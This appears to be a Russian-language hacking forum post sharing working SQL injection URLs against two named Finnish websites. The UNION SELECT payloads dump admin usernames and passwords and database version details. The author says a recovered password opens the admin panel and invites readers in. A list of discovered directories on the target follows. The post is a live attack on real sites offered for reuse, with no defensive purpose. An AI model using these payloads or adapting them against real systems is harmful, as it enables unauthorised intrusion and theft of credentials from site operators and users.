сайтик как вы уже наверное догадались на финском)
Код:
http://www.ymparistokasvatus.fi/vihrealippu/osallistujat/show.php?id=-110+union+select+1,unhex(hex(concat_ws(0x3a,Id,username,password))),3,4,5,6,7,8,9,10,11,12+from+admins--
парольчик подходит, так што милости просим в админку)
погнали дальше!!!
http://www.surfnet.fi/zargon/movies/show.php?id=-207+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,concat_ws(0x3a,dat abase(),version(),user(),@@version_compile_os),26, 27,28,29,30--
zargon:4.1.12-standard
c-linux-gnu-log:zargon@localhost
http://www.surfnet.fi/zargon/movies/show.php?id=-207+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,concat_ws(0x3a,use r_name,user_password),26,27,28,29,30+from+4images_ users--
http://www.surfnet.fi/zargon/movies/show.php?id=-207+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,concat_ws(0x3a,use r,passwd),26,27,28,29,30+from+users--
диры
Код:
/
/download/
/search/
/cgi-bin/
/images/
/news/
/links/
/support/
/forum/
/services/
/partners/
/banner/
/mobile/
/weather/
/entertainment/
/doc/
/chat/
/tv/
/multimedia/
/pictures/
/test/
/navigation/
/portfolio/
/polls/
/comics/
/pop/
/ssh/
/guestbook/
/bilder/
/co/
/presentation/
/inc/
/regional/
/iso/
/fonts/
/cinema/
/IT/
/mil/
/lunch/
/vortex/
/htdig/
/http%3A%2F%2Fwww/
/newsimages/
/reklam/
/happenings/
/cgi-bin2/
/regionalnews/
/contact/
/ws/
/messenger/
/tourism/
/webshop/
/newusers/
/faq/
/css/
/cat/
/isp/
/price/
/webcam/
/booking/
/icons/
/pub/
/users/
/errors/
--------------------------------
--------------------------------